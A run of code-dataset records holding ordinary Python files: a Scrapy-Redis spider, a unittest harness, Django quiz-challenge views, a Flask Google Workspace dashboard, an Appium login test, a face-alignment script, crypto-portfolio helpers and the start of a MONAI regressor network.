scrapy_redis.spiders import RedisSpider\nfrom pad58.items import Pad58Loader\nclass Myspider(RedisSpider):\n name = 'myspider_58page'\n redis_key = 'myspider:58_urls'\n\n def __init__(self,*args,**kwargs):\n domain = kwargs.pop('domain','')\n self.allowed_domans = filter(None,domain.split(','))\n super(Myspider,self).__init__(*args,**kwargs)\n self.url = '' \\\n '://bj.58.com'\n def parse(self, response):\n el = Pad58Loader(response=response)\n PageUrl = response.xpath(\"//a[contains(@class,'next')]/@href\").extract()\n self.log(PageUrl,level=log.DEBUG)\n r = Redis()\n if PageUrl != []:\n r.lpush('myspider:58_urls',self.url+PageUrl[0])\n sleep(1)\n el.add_value('UrlofPage',self.url+PageUrl[0])\n urls = response.xpath('//table[contains(@class,\"tbimg\")]/tr')\n for url in urls:\n url = url.xpath(\"td[contain(@class,'t')]/a/href\").extract()\n if len(url) ==1 and 'zhuan' not in url[0]:\n r.lpush('myspider:start_urls',url[0])\n return el.load_item()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pad58/pad58/spiders/58Urlspider.py","file_name":"58Urlspider.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"513062692","text":"import inspect\nimport random\nimport unittest\n\nimport solutions\n\n\nrandom_list = [random.randint(0, 1000) for x in range(0, 100)]\n\n\nclass TestSequense(unittest.TestCase):\n def runTest(self):\n pass\n\n\nclass TestSolutions():\n def get_tests(self):\n all_functions = inspect.getmembers(solutions, inspect.isfunction)\n probs = [func for func in all_functions if func[0].startswith('p') and func[0][-2:].isdigit()]\n\n attempted = lambda source: source.split('\\n')[1].strip() != 'return None'\n\n return [(prob[0], getattr(self,\n 'test_'+prob[0],\n self.test_unimplemented),) for prob in probs if attempted(inspect.getsource(prob[1]))]\n\n @staticmethod\n def test_unimplemented(self, seq):\n pass\n\n @staticmethod\n def test_p01(seq):\n seq.assertTrue(solutions.p01(random_list) == random_list[-1], 'Returned the wrong element.')\n\n @staticmethod\n def test_p02(seq):\n seq.assertTrue(solutions.p02(random_list) == random_list[-2], 'Returned the wrong element.')\n\n @staticmethod\n def test_p03(seq):\n index = random.randint(1, len(random_list))\n seq.assertTrue(solutions.p03(random_list, index) == random_list[index-1],\n 'Did not return the correct element. (This problem calls the first item #1, not #0)')\n\n @staticmethod\n def test_p04(seq):\n random_len_list = [random.randint(0, 1000) for x in range(0, random.randint(1, 100))]\n seq.assertTrue(solutions.p04(random_len_list) == len(random_len_list), 'Wrong number of elements found.')\n\n @staticmethod\n def test_p05(seq):\n random_list_copy = random_list[:]\n random_list_copy.reverse()\n seq.assertTrue(solutions.p05(random_list) == random_list_copy, 'List was not reversed.')\n\n @staticmethod\n def test_p06(seq):\n random_list_copy = random_list[:]\n random_list_copy.reverse()\n\n palindrome = random_list + random_list_copy\n seq.assertTrue(solutions.p06(palindrome), 'Failed to detect palindrome.')\n palindrome.append(0)\n seq.assertFalse(solutions.p06(palindrome), 'Failed to detect non-palindrome.')\n\n\ntest_solutions = TestSolutions()\ntest_sequence = TestSequense()\n\n\ndef test_generator(name):\n def test(self):\n getattr(TestSolutions, 'test_'+name, TestSolutions.test_unimplemented)(test_sequence)\n return test\n\n\nif __name__ == '__main__':\n probs = test_solutions.get_tests()\n for p in probs:\n test_name = 'test_%s' % p[0]\n test = test_generator(p[0])\n setattr(TestSequense, test_name, test)\n unittest.main()\n","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202831709","text":"from django.contrib.auth.models import User\r\nfrom django.http import JsonResponse\r\nfrom app.models import *\r\n\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\nfrom django.db import transaction\r\nfrom dateutil.parser import parse\r\nfrom datetime import datetime\r\n\r\ndef answered_questions_comment(request):\r\n result ={}\r\n pk = int(request.GET.get('pk' , None))\r\n pkres = int(request.GET.get('pkres' , None))\r\n chal = int(request.GET.get('chal' , None))\r\n time = str(request.GET.get('time' , None))\r\n newtime = datetime.strptime(time, '%Y%m%d%H%M%S').date()\r\n\r\n with transaction.atomic():\r\n c_chal = Challenges.objects.get(id=chal)\r\n c_ques = ChallengeQuestions.objects.get(id=pk)\r\n comex = c_ques.comment.filter(challenge = c_chal , user = c_chal.attacher , date_created__lte =newtime ).exists()\r\n\r\n if comex:\r\n com = c_ques.comment.get(challenge = c_chal , user = c_chal.attacher , date_created__lte =newtime )[0]\r\n return JsonResponse( {'respond':1 , 'direction':com.direction , 'comment':com.comment })\r\n\r\n return JsonResponse( {'respond':0})\r\n\r\n@login_required\r\ndef commentquestions(request):\r\n qid = int(request.GET.get('qid' , None))\r\n value = str(request.GET.get('value' , None))\r\n chal = int(request.GET.get('chal' , None))\r\n with transaction.atomic():\r\n c_chal = Challenges.objects.get(id=chal)\r\n c_ques = ChallengeQuestions.objects.get(id=qid)\r\n sd = timezone.now()\r\n c_com = ChallengeQuestionComments(user = request.user , comment = value , challenge = c_chal , direction = find_direction(value) )\r\n c_com.save()\r\n c_ques.comment.add(c_com)\r\n\r\n\r\n\r\n\r\n return JsonResponse( {'answer':1 , 'direction':find_direction(value) , 'usr':request.user.first_name +' '+request.user.last_name , 'usrid':request.user.id})\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef answeredquestions(request):\r\n pk = int(request.GET.get('pk' , None))\r\n pkres = int(request.GET.get('pkres' , None))\r\n answer = str(request.GET.get('answer' , None))\r\n chal = int(request.GET.get('chal' , None))\r\n time = int(request.GET.get('time' , None))\r\n\r\n challenge = Challenges.objects.get(id = chal)\r\n question = ChallengeQuestions.objects.get(id = pk)\r\n\r\n challenge_res = ChallengesResult.objects.get(id = pkres)\r\n\r\n if challenge_res.number == 10:\r\n challenge_res.active = 0\r\n challenge.status = 2\r\n challenge.save()\r\n\r\n\r\n if question.curect_answer == answer:\r\n challenge_res.status = 1\r\n challenge_res.seconds = time\r\n challenge_res.user_answer = answer\r\n challenge_res.save()\r\n else:\r\n challenge_res.status = 2\r\n challenge_res.seconds = time\r\n challenge_res.user_answer = answer\r\n challenge_res.save()\r\n return JsonResponse( {'answer':question.curect_answer})\r\n\r\n return JsonResponse( {'answer':question.curect_answer})\r\n\r\n\r\n\r\n\r\ndef challenge_new(request):\r\n pk = int(request.GET.get('pk' , None))\r\n user = ChallengeUser.objects.get(id = pk)\r\n exist = Challenges.objects.filter(attacher = request.user , defender = user.user , status__lt = 2).exists()\r\n\r\n if not exist:\r\n new_challenge = Challenges(attacher = request.user , defender = user.user , status = 0)\r\n new_challenge.save()\r\n notify.send(sender=request.user , actor=request.user , verb=\"Challenge You\" , action_object=new_challenge ,target = new_challenge , recipient=new_challenge.defender, description='Do You Think Your Talented ?' , level='warning' )\r\n\r\n return JsonResponse( {'error_msg':True})\r\n return JsonResponse( {'error_msg':False})\r\n\r\n\r\ndef challenge_pindding(request):\r\n pk = int(request.GET.get('pk' , None))\r\n action = int(request.GET.get('action' , None))\r\n try:\r\n challenge = Challenges.objects.get(defender = request.user , id = pk , status = 0)\r\n challenge.status = action\r\n challenge.save()\r\n\r\n notify.send(sender=request.user , actor=request.user , verb=\"Accepted You Challenge\" , action_object=challenge ,target = challenge , recipient=new_challenge.attacher, description='Click Here To See It Online !' , level='warning' )\r\n\r\n return JsonResponse( {'error_msg':True})\r\n except Challenges.DoesNotExist:\r\n return JsonResponse( {'error_msg':False})\r\n\r\n\r\n return JsonResponse( {'error_msg':False})\r\n","sub_path":"app/api_group_single.py","file_name":"api_group_single.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"651821279","text":"import logging\nfrom collections import OrderedDict, namedtuple\nfrom datetime import date, datetime, timezone, timedelta\n\nimport numpy as np\nimport pandas as pd\nfrom flask import current_app\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\n\nfrom .helpers import parse_timestamp_str\nfrom .drive import file_tree_to_df\nfrom .models import User\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_service_handles():\n \"\"\"Get dictionary of {service_name: service_handle}.\"\"\"\n SERVICE_ACCOUNT_FILE = current_app.config['SERVICE_ACCOUNT_FILE']\n # GROUP_KEY = current_app.config['GROUP_KEY']\n SCOPES = current_app.config['SCOPES']\n\n credentials = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n delegated_credentials = credentials.with_subject(\n current_app.config['CREDENTIALS_AS_USER'])\n\n dir_service = build('admin', 'directory_v1', credentials=delegated_credentials, cache_discovery=False)\n files_service = build('drive', 'v3', credentials=delegated_credentials, cache_discovery=False)\n cal_service = build('calendar', 'v3', credentials=delegated_credentials, cache_discovery=False)\n return {\n 'dir': dir_service,\n 'files': files_service,\n 'cal': cal_service\n }\n\n\nSERVICE_HANDLES = get_service_handles()\n\n\ndef get_members_dict():\n \"\"\"Get dictionary of {google_id: email_address}.\n\n Return:\n members_dict (dict): google ID: email dictionary.\n \"\"\"\n service = SERVICE_HANDLES['dir']\n\n # GOOGLE GROUP MEMBERS\n group_key = current_app.config['GROUP_KEY']\n logging.info(\"Looking up group members list.\")\n res = service.members().list(groupKey=group_key).execute()\n members_dict = {i['id']: i['email'] for i in res['members'] if 'email' in i}\n\n # DOMAIN-ONLY MEMBERS\n domain_users = get_domain_users()\n domain_dict = {u.id: u.email for u in domain_users}\n members_dict.update(domain_dict)\n\n return members_dict\n\n\ndef get_domain_users():\n \"\"\"Get list of domain users (who might not be in specified Google Group).\n\n Warning: will only fetch up to 100 users.\n \"\"\"\n users = []\n service = SERVICE_HANDLES['dir']\n logger.info(\"Looking up domain-specific users.\")\n res = service.users().list(customer='my_customer').execute()\n User = namedtuple('User', ['id', 'email', 'full_name'])\n for user in res['users']:\n user_id = user['id']\n full_name = user['name']['fullName']\n email = user['primaryEmail']\n users.append(User(user_id, email, full_name))\n return users\n\n\ndef find_user_by_email(find_email):\n user = None\n for u in User.query.all():\n if find_email in u.known_emails:\n user = u\n break\n return user\n\n\nclass ApiTable:\n cols_show = None # subclasses will override\n cols_other = None\n\n def __init__(self):\n self._df = None # subclasses will override\n self.last_refresh = datetime.utcnow()\n self.refresh_minutes = 1\n self.refresh_df()\n\n def refresh_df(self):\n \"\"\"Subclasses will override this method.\"\"\"\n pass\n\n @property\n def cols(self):\n return list(self.cols_show) + list(self.cols_other)\n\n @property\n def df(self):\n if datetime.utcnow() > (self.last_refresh + timedelta(minutes=self.refresh_minutes)):\n self.refresh_df()\n self.last_refresh = datetime.utcnow()\n return self._df\n\n @staticmethod\n def _get_utc_naive(dt):\n \"\"\"Convert timezone aware timestamp to UTC naive timestamp.\"\"\"\n return dt.astimezone(timezone.utc).replace(tzinfo=None)\n\n\nclass StatusTable(ApiTable):\n\n cols_show = OrderedDict([\n ('status', 'Status'),\n ('n_requests', 'Requests'),\n ])\n cols_other = []\n\n def __init__(self, engine):\n self.engine = engine\n super().__init__()\n\n def refresh_df(self):\n \"\"\"Return status table. Example below.\n status n_requests\n 0 Unassigned 2\n 1 Processing 0\n 2 Shipped 0\n 3 Received 1\n 4 Problem 0\n 5 Cancelled 0\n \"\"\"\n\n status_dict = OrderedDict([\n ('unassigned', 'Unassigned'),\n ('processing', 'Processing'),\n ('shipped', 'Shipped'),\n ('received', 'Received'),\n ('problem', 'Problem'),\n ('cancelled', 'Cancelled')])\n\n statuses = pd.read_sql(\"select status, count(*) as n_requests from strains.requests group by status;\",\n self.engine)\n statuses.status = statuses.status.apply(lambda v: status_dict[v])\n statuses = statuses.set_index('status').reindex(status_dict.values())\n statuses = statuses['n_requests'].apply(lambda v: 0 if np.isnan(v) else int(v)).reset_index()\n self._df = statuses\n\n\nclass Calendar(ApiTable):\n cols_show = OrderedDict([\n ('title', 'Item'),\n ('start', 'When'),\n ('location', 'Where')])\n cols_other = ['description', 'url', 'end']\n show_n = 5\n\n def refresh_df(self):\n service = SERVICE_HANDLES['cal']\n collection = service.events()\n cmd = collection.list(calendarId=current_app.config['CALENDAR_ID'],\n orderBy='startTime',\n singleEvents=True)\n res = cmd.execute()\n\n cal = pd.DataFrame.from_records(res['items'])\n cal.rename(columns={'htmlLink': 'url', 'summary': 'title'}, inplace=True)\n cal = cal[self.cols].copy()\n cal['location'] = cal['location'].apply(lambda v: '' if type(v) != str else v)\n cal['start'] = cal['start'].apply(Calendar.parse_datetime)\n cal['end'] = cal['end'].apply(Calendar.parse_datetime)\n cal['in_past'] = cal['end'].apply(Calendar.in_past)\n cal['description'] = cal['description'].apply(\n lambda v: v.strip() if type(v) is str else '')\n cal = cal.query('~in_past').head(self.show_n)\n self._df = cal\n\n @staticmethod\n def parse_datetime(start_dict):\n \"\"\"Get naive datetime in UTC or date for dates.\"\"\"\n if 'dateTime' in start_dict:\n return parse_timestamp_str(start_dict['dateTime'])\n if 'date' in start_dict:\n return datetime.strptime(start_dict['date'], '%Y-%m-%d').date()\n\n @staticmethod\n def parse_time(time):\n \"\"\"Return naive datetime in UTC.\"\"\"\n if pd.isnull(time):\n return np.nan\n stripped = time[:-3] + time[-2:] # remove colon in UTC offset\n dt = datetime.strptime(stripped, '%Y-%m-%dT%H:%M:%S%z')\n return ApiTable._get_utc_naive(dt)\n\n @staticmethod\n def in_past(t):\n \"\"\"Get 'in past' status (True or False) for date or time.\n\n Args:\n t: timezone aware or naive timestamps, or date\n \"\"\"\n now_naive = datetime.now()\n now = now_naive if t.tzinfo is None else now_naive.replace(tzinfo=timezone.utc)\n if isinstance(t, datetime):\n return t < now\n if type(t) == date:\n end_time = datetime.combine(t, datetime.min.time()) + timedelta(days=1)\n end_time = end_time.replace(tzinfo=timezone.utc)\n return end_time < now\n\n\nclass RecentDocs(ApiTable):\n cols_show = OrderedDict([\n ('title', 'Document'),\n ('date_modified', 'Modified'),\n ('last_user', 'Modified by')])\n\n cols_other = ['date_created', 'url', 'icon', 'kind', 'thumb']\n show_n = 20\n\n def refresh_df(self):\n service = SERVICE_HANDLES['files']\n file_fields = (\"files(kind,id,name,webViewLink,iconLink,thumbnailLink,createdTime,\"\n \"modifiedTime,lastModifyingUser/displayName)\")\n collection = service.files()\n cmd = collection.list(corpora='teamDrive',\n includeTeamDriveItems=True,\n orderBy='modifiedTime desc',\n pageSize=20,\n supportsTeamDrives=True,\n teamDriveId=current_app.config['TEAM_DRIVE_ID'],\n fields=file_fields)\n res = cmd.execute()\n files = pd.DataFrame.from_records(res['files'])\n files.lastModifyingUser = files.lastModifyingUser.apply(\n lambda v: v['displayName'] if type(v) == dict else v)\n files.createdTime = files.createdTime.apply(parse_timestamp_str)\n files.modifiedTime = files.modifiedTime.apply(parse_timestamp_str)\n files.rename(columns={'webViewLink': 'url',\n 'thumbnailLink': 'thumb',\n 'iconLink': 'icon',\n 'modifiedTime': 'date_modified',\n 'createdTime': 'date_created',\n 'lastModifyingUser': 'last_user',\n 'name': 'title'\n }, inplace=True)\n # not used: 'id'\n # file_columns = ['title', 'date_modified', 'date_created', 'last_user', 'url', 'icon' , 'kind', 'thumb']\n files = files[self.cols].copy()\n self._df = files\n\n\nclass ReviewTable(ApiTable):\n\n def __init__(self, root_folder_id, root_folder_title):\n self.refresh_minutes = 5\n self.root_folder_id = root_folder_id\n self.root_folder_title = root_folder_title\n super().__init__()\n\n cols_show = OrderedDict([\n ('title', 'Document'),\n ('date_modified', 'Modified'),\n # ('last_user', 'Modified by')\n ])\n cols_other = ['path', 'date_created', 'icon', 'id', 'kind', 'last_user', 'mimeType',\n 'thumb', 'url_content', 'url_view']\n # cols_other = ['date_created', 'url', 'icon', 'kind', 'thumb']\n\n def refresh_df(self):\n files = file_tree_to_df(self.root_folder_id, self.root_folder_title)\n files = files[list(ReviewTable.cols_show) + ReviewTable.cols_other]\n files = files.sort_values(['path', 'title'])\n self._df = files\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"582072670","text":"# -*- coding: utf-8 -*-\nimport unittest\nimport HTMLTestRunner\nimport os\nfrom appium import webdriver\nfrom time import sleep\nimport pytest\nimport time\nfrom test.test_decimal import file\nfrom symbol import except_clause\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nclass Dttest(unittest.TestCase):\n \n def __init__(self, methodName='runTest'):\n unittest.TestCase.__init__(self, methodName=methodName)\n \n \n \n def setUp(self):\n print('start setup')\n desired_caps = {}\n desired_caps['platformName'] = 'Android'\n desired_caps['platformVersion'] = '5.1.1'\n #链接设备,使用adb devices命令去查询\n #荣耀7i的版本号是69T7N16719001974\n #华为p9的版本号是PBV7N16719012844\n desired_caps['deviceName'] = '127.0.0.1:62001'\n desired_caps['automationName'] = 'Uiautomator2'\n #通过adb shell logcat|findstr \"Displayed\"\n desired_caps['appPackage'] = 'com.zjmy.eink'\n desired_caps['appActivity'] = '.presenters.activity.login.LoginActivity'\n desired_caps['unicodeKeyboard'] = True\n desired_caps['resetKeyboard'] = True\n #desired_caps['autoGrantPermissions'] = True \n \n #appium链接地址\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_caps)\n def tearDown(self):\n self.driver.quit()\n print('tearDown')\n \n def test_login_success(self):#用例\n self.always_allow()\n sleep(2)\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_user\").clear()\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_user\").send_keys(\"201808\")\n sleep(2)\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_password\").clear()\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_password\").send_keys(\"201808\")\n self.driver.find_element_by_id(\"com.zjmy.eink:id/btn_login\").click()\n sleep(3) #3秒登录检测\n \n #点击书城\n self.driver.find_element_by_id(\"com.zjmy.eink:id/ll_tab_menu_bookstore\").click()\n sleep(3)\n #进行搜索\n self.driver.find_element_by_id(\"com.zjmy.eink:id/tv_search\").click()\n sleep(3)\n self.driver.find_element_by_id(\"com.zjmy.eink:id/tv_search\").send_keys(\"格列佛\")\n sleep(3)\n #点击搜索按钮\n self.driver.find_element_by_xpath(\"//*[@resource-id=com.zjmy.eink:id/tv_search][@text='搜索']\")\n #self.driver.find_element_by_link_text(\"搜索\")\n sleep(3)\n #点击这本书\n self.driver.flick(40, 308, 279, 740)\n sleep(6)\n \n \n \n def always_allow(self):\n for i in range(3):\n #toast_loc = (\"xpath\", \".//*[contains(@text,'%s')]\"%text)\n loc = (\"xpath\", \".//*[contains(@text,'始终允许')]\")\n try:\n e = WebDriverWait(self.driver, 1, 0.5).until(EC.presence_of_element_located(loc))\n e.click()\n except:\n pass \n \nif __name__ == '__main__':\n suite = unittest.TestSuite()#创建一个测试集合\n #需要测试的用例就addTest,不加的就不会运行\n #suite.addTest(Dttest('test_login_success'))\n suite.addTest(Dttest('test_login_failer'))\n #unittest.TextTestRunner(verbosity=1).run(suite)\n #timestr = time.strftime('%Y-%m-%d %X',time.localtime(time.time()))#本地日期时间作为测试报告的名字\n \n filename = 'D:\\\\appium\\\\report1.html'#这个路径改成自己的目录路径\n fp = open(filename,'wb')\n runner = HTMLTestRunner.HTMLTestRunner(\n stream=fp,\n title='result',\n description='report'\n )\n \n runner.run(suite)\n fp.close()\n ","sub_path":"sxreader_appium_student/com/zjmy/sxreader/testAppium.py","file_name":"testAppium.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"27241255","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 01 05:18:38 2017\n\n@author: zhaoy\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport json\nimport os\nimport os.path as osp\n\n#from matplotlib import pyplot as plt\nimport _init_paths\nfrom fx_warp_and_crop_face import get_reference_facial_points, warp_and_crop_face, FaceWarpException\n\nGT_RECT = [68, 68, 182, 182]\nGT_AREA = (GT_RECT[2] - GT_RECT[0] + 1) * (GT_RECT[3] - GT_RECT[1] + 1)\noverlap_thresh = 0.3\n\nonly_align_missed = False\ndo_align = True\ndefault_square = True\npadding_factor = 0.25\nouter_padding = (0, 0)\noutput_size = (224, 224)\n\nreference_5pts = get_reference_facial_points(\n output_size, padding_factor, outer_padding, default_square)\n\n\nlandmark_fn = r'../landmark_yrj_8imgs_wrong_correct_new_format.json'\nimg_root_dir = r'C:/zyf/dataset/webface/CASIA-maxpy-clean'\n#landmark_fn = r'../../../webface-mtcnn-fd-rlt/landmark_correct_new_format_add_missed.json'\n#img_root_dir = r'/disk2/data/FACE/webface/CASIA-maxpy-clean'\naligned_save_dir = img_root_dir + '_mtcnn_simaligned_224x224_for_vggface'\n\nlog_fn1 = 'align_succeeded_list.txt'\nlog_fn2 = 'align_failed_list.txt'\nlog_fn3 = 'faces_wrong_max_score_idx_list.txt'\n\nlog_align_params = 'align_params.txt'\n\n\ndef get_gt_overlap(faces):\n rects = [it['rect'] for it in faces]\n\n rects_arr = np.array(rects)\n# print 'rects_arr: {}'.format(rects_arr)\n area = (rects_arr[:, 2] - rects_arr[:, 0] + 1) * \\\n (rects_arr[:, 3] - rects_arr[:, 1] + 1)\n# print 'area: {}'.format(area)\n\n o_x1 = np.maximum(GT_RECT[0], rects_arr[:, 0])\n o_x2 = np.minimum(GT_RECT[2], rects_arr[:, 2])\n o_y1 = np.maximum(GT_RECT[1], rects_arr[:, 1])\n o_y2 = np.minimum(GT_RECT[3], rects_arr[:, 3])\n\n o_w = np.maximum(0, o_x2 - o_x1 + 1)\n o_h = np.maximum(0, o_y2 - o_y1 + 1)\n\n overlap = o_w * o_h\n# print 'overlap area: {}'.format(overlap)\n\n overlap = overlap / (GT_AREA + area - overlap)\n# print 'overlap ratio: {}'.format(overlap)\n\n return overlap\n\n\ndef get_max_gt_overlap_face(faces, thresh=0.5):\n overlap = get_gt_overlap(faces)\n\n max_id = overlap.argmax()\n# print 'overlap[max_id]: %1.3f' % overlap[max_id]\n if overlap[max_id] >= thresh:\n return max_id\n else:\n return -1\nfp_in = open(landmark_fn, 'r')\nimg_list = json.load(fp_in)\nfp_in.close()\n\nif only_align_missed:\n print('Only process missed faces!!!')\n\nif not osp.exists(img_root_dir):\n print('ERROR: webface root dir not found!!!')\n\nelse:\n if not osp.exists(aligned_save_dir):\n print('mkdir for aligned faces, aligned root dir: ', aligned_save_dir)\n os.makedirs(aligned_save_dir)\n\n# fp_log_params = open(osp.join(aligned_save_dir, log_align_params), 'w')\n# params_template = '''\n## default_square = {}\n## padding_factor = {}\n## outer_padding = {}\n## output_size = {}\n# '''\n# params_template = ('default_square = {}\\n'\n# 'padding_factor = {}\\n'\n# 'outer_padding = {}\\n'\n# 'output_size = {}\\n')\n#\n# fp_log_params.write(params_template.format(\n# default_square, padding_factor,\n# outer_padding, output_size)\n# )\n# fp_log_params.close()\n\n fp_log1 = open(osp.join(aligned_save_dir, log_fn1), 'w')\n fp_log2 = open(osp.join(aligned_save_dir, log_fn2), 'w')\n fp_log3 = open(osp.join(aligned_save_dir, log_fn3), 'w')\n\n# imgSize = [112, 96];\n# coord5points = [[30.2946, 65.5318, 48.0252, 33.5493, 62.7299],\n# [51.6963, 51.5014, 71.7366, 92.3655, 92.2041]];\n# pts_dst = np.float32(coord5points).transpose()\n\n failed_count1 = 0\n failed_count2 = 0\n\n for item in img_list:\n err_msg = ''\n if 'filename' not in item:\n err_msg = \"'filename' not in item, break...\"\n print(err_msg)\n fp_log2.write(err_msg + '\\n')\n break\n\n img_fn = osp.join(img_root_dir, item['filename'])\n save_fn = osp.join(aligned_save_dir, item['filename'])\n save_fn_dir = osp.dirname(save_fn)\n\n print('===> Processing image: ' + img_fn)\n\n if 'faces' not in item:\n err_msg = \"'faces' not in item\"\n fp_log2.write(item['filename'] + ': ' + err_msg + '\\n')\n continue\n elif 'face_count' not in item:\n err_msg = \"'face_count' not in item\"\n fp_log2.write(item['filename'] + ': ' + err_msg + '\\n')\n continue\n\n if only_align_missed and 'used_gt' not in item:\n print('skipped because only_align_missed')\n continue\n\n\n if do_align and not osp.exists(save_fn_dir):\n os.makedirs(save_fn_dir)\n\n nfaces = item['face_count']\n\n if nfaces < 1:\n fp_log2.write(item['filename'] + ': ' +\n \"item['face_count'] < 1\" + '\\n')\n continue\n\n if nfaces != len(item['faces']):\n fp_log2.write(item['filename'] + ': ' +\n \"item['face_count'] != len(item['faces']\" + '\\n')\n continue\n\n faces = item['faces']\n scores = np.array([it['score'] for it in faces])\n max_score_idx = scores.argmax()\n\n# max_score_idx = 0\n#\n# if nfaces > 1:\n# for idx in range(1, nfaces):\n# if faces[idx]['score'] > faces[max_score_idx]['score']:\n# max_score_idx = idx\n\n overlaps = get_gt_overlap(faces)\n\n max_overlap_idx = overlaps.argmax()\n\n if max_score_idx != max_overlap_idx:\n fp_log3.write(item['filename'] + ': ' + '\\n')\n fp_log3.write(\"--> max_score_idx = {}\\n\".format(max_score_idx))\n fp_log3.write(\"--> max_overlap_idx = {}\\n\".format(max_overlap_idx))\n fp_log3.write(\"--> scores = {}\\n\".format(scores))\n fp_log3.write(\"--> overlaps = {}\\n\".format(overlaps))\n\n if overlaps[max_overlap_idx] >= overlap_thresh:\n fp_log1.write(item['filename'] + ': ' + \" max_overlap_idx=\"\n + str(max_overlap_idx) + '\\n')\n if do_align:\n points = np.array(faces[max_overlap_idx]['pts'])\n facial5points = np.reshape(points, (2, -1))\n # print facial5points\n\n try:\n image = cv2.imread(img_fn, True)\n\n dst_img = warp_and_crop_face(\n image, facial5points, reference_5pts, output_size)\n cv2.imwrite(save_fn, dst_img)\n except Exception as e:\n failed_count1 += 1\n fp_log2.write(item['filename'] + ': ' +\n \"exception when loading image\"\n \" or aligning faces or saving results\" + '\\n')\n fp_log2.write(\"\\texception: {}\".format(e) + '\\n')\n continue\n\n fp_log1.write(item['filename'] + ': ' +\n \" succeeded to align\" + '\\n')\n else:\n failed_count2 += 1\n\n fp_log2.write(item['filename'] + ': ' +\n \"no faces have overlap>={} with groundtruth\".format(\n overlap_thresh) +\n '\\n')\n fp_log2.write(\"--> max_score_idx = {}\\n\".format(max_score_idx))\n fp_log2.write(\"--> max_overlap_idx = {}\\n\".format(max_overlap_idx))\n fp_log2.write(\"--> scores = {}\\n\".format(scores))\n fp_log2.write(\"--> overlaps = {}\\n\".format(overlaps))\n\n fp_log2.write(\"\\n==>Faied images: {}\\n\".format(failed_count1\n + failed_count2))\n fp_log2.write(\"\\t{} failed because of exception\\n\".format(failed_count1))\n fp_log2.write(\"\\t{} failed because of max_overlap 0:\n return (\" You are in profit of {:.1f} dollars \".format(usdProfLossPrice))\n else:\n return (\"Sorry, you are in loss of {:.1f}\".format(usdProfLossPrice))\n\n\ndef quantity(coinName): # it gives the available quantity of a coin\n coinName = coinName + \"BTC\"\n data = c.execute(\"\"\"\n SELECT sum(Amount)\n FROM coinsXaction\n WHERE Market = \"{}\"\n \"\"\".format(coinName))\n for line in data:\n qty = int(line[0])\n if qty == 0:\n return (\"you sold all your {} coin\".format(coinName))\n else:\n return (\" You've got {} {} coin\".format(qty, coinName))\n break\n","sub_path":"processUnit.py","file_name":"processUnit.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"263030249","text":"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Optional, Sequence, Union\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom monai.networks.blocks import Convolution, ResidualUnit\nfrom monai.networks.layers.convutils import calculate_out_shape, same_padding\nfrom monai.networks.layers.factories import Act, Norm\nfrom monai.networks.layers.simplelayers import Reshape\nfrom monai.utils import ensure_tuple, ensure_tuple_rep\n\n\nclass Regressor(nn.Module):\n \"\"\"\n This defines a network for relating large-sized input tensors to small output tensors, ie. regressing large\n values to a prediction. An output of a single dimension can be used as value regression or multi-label\n classification prediction, an output of a single value can be used as a discriminator or critic prediction.\n \"\"\"\n\n def __init__(\n self,\n in_shape: Sequence[int],\n out_shape: Sequence[int],\n channels: Sequence[int],\n strides: Sequence[int],\n kernel_size: Union[Sequence[int], int] = 3,\n num_res_units: int = 2,\n act=Act.PRELU,\n norm=Norm.INSTANCE,\n dropout: Optional[float] = None,\n bias: bool = True,\n ) -> None:\n \"\"\"\n Construct the regressor network with the number of layers defined by `channels` and `strides`. Inputs are\n first passed through the convolutional layers in the forward pass, the output from this is then pass\n through a fully connected layer to relate them to the final output tensor.\n\n Args:\n in_shape: tuple of integers stating the dimension of the input tensor (minus batch dimension)\n out_shape: tuple of integers stating the dimension of the final output tensor\n channels: tuple of integers stating the output channels of each convolutional layer\n strides: tuple of integers stating the stride (downscale factor) of each convolutional layer\n kernel_size: integer or tuple of integers stating size of convolutional kernels\n num_res_units: integer stating number of convolutions in residual units, 0 means no residual units\n act: name or type defining activation layers\n norm: name or type defining normalization 